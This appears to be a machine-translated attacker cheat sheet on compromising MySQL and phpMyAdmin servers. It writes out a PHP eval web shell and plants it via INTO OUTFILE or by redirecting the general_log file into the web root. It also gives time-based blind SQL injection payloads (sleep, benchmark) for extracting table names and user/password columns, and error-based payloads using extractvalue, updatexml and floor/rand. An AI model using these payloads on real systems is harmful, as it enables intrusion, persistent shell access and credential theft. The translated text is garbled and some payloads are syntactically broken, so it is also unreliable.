phpmyadmin getshell method
1, importing and exporting settings to see if there is Global Variables like Show '% secure-file-priv%';
2, if the secure-file-priv set is empty or not specified folder may be utilized, write Trojans, SELECT "<? php @eval ($ _ POST [s]);?>" into outfile "var / www / html / xx.php"
The use of log files getshell, mysql greater than 5.0 creates a log file and creates a log file as a global variable, and can read and write
common log file is divided into business and system logs, log files to use Phpmyadmin Getshell
1, by weak password or blasting log phpmyadmin, execute sql statement select @@ datadir; after that, the database source storage position to guess the location of D: \ phpstudy_pro under \ the WWW
2, to view the log status, Show the Variables like '% General%'
3, turn on logging function, and to modify the path and file name of the recording, Global general_log SET = 'ON'
. 4, save the modified file location, Global general_log_file SET = 'D: /phpstudy_pro/www/log.php'
. 5, the write word select "< ? php @eval ($ _ POST [ s]);?> "
Sql injection time-based
view inject the current page using a specific function, so that the database to perform at a certain time waiting for pages
Function
sleep (), pause for a time database
benchmark (), can be performed to test the speed of certain operations. 1 is the number of parameters may need to be performed, parameter 2 is an expression that certain actions. Expression may be any scalar expression, such as the return value is a subquery or a scalar function, such as benchmark (100,100 * 100)
Procedure
1 to find the injection point, 1 'and SLEEP (. 3)% 23 is
2, the length of the current database acquired, and if (ascii (substring ( database (), 1,1)) = 114, sleep (5),' bye '), only correctly only sleep
3, a data sheet, and if (ascii (substring ( (select distinct table_name from information_schema.columns where table_schema = database () limit 0,1), 1,1)) = 114, sleep (5), 'bye' ), SLEEP will only correctly, resulting value table, such as User
. 4, an acquisition table field, and if (ascii (substring ( (select distinct column_name from information_schema.tables where table_schema = database () and table_name = 'users ( 16 needs to be transcoded prohibited)' limit 0,1), 1,1) ) = 114, sleep (5), 'bye'), only correctly will sleep, get valuable columns in the table, such as User, password
. 5, to obtain the value of the contents of the table, and if (ascii (substring ( (select distinct select concat (user, 0x7e, password) from users limit 0,1), 1,1)) = 114, sleep (5), ' bye'), only correctly will sleep, to get the contents of the table
6, crack the code, scan a directory, log background
Error type sql injection
exploit some of the error function structure Pyload, after being given the implementation of the database, the data needed to bring out, to achieve the purpose of attack
Error function
1, extractvalue (xml, value) , extractvalue () function also launched MySQL data to xml document query and modify the xpath function after 5.1.
extractValue () to set a random number parameter xml. Using extractValue () Gets the data payload is fixed: or extractValue (1, the concat ( '#', (SELECT * from (SELECT ....) A))) #
2, The updatexml (parameter 1, parameter 2, parameter 3 ) function, updatexml () function is a MySQL data to xml document query and modify the xpath function. Changing the value of the eligible xml document, the parameter xml document 1, xpath argument is a format string 2, 3 is used to replace the parameter string format string found qualified
The updatexml () Gets a fixed payload data is: or the updatexml (. 1, the concat ( '#', (SELECT * from (SELECT ...) a)), 0) #
extracvalue () and the updatexml () function is given, taken are limiting character length 32
3, floor () function returns is less than equal to the maximum integer to the value required and conut () counts, RAND () to generate 0-1 random number, but their number is provided, then becomes longer fixed, group by sorting, etc. with the use of long as it can achieve the same object function may be used
(select 1 from (select count ( *), concat_ws ( '-', (select database ()), floor (rand () * 2)) as a from information_schema.tables group by a) b ) where username = 'admin'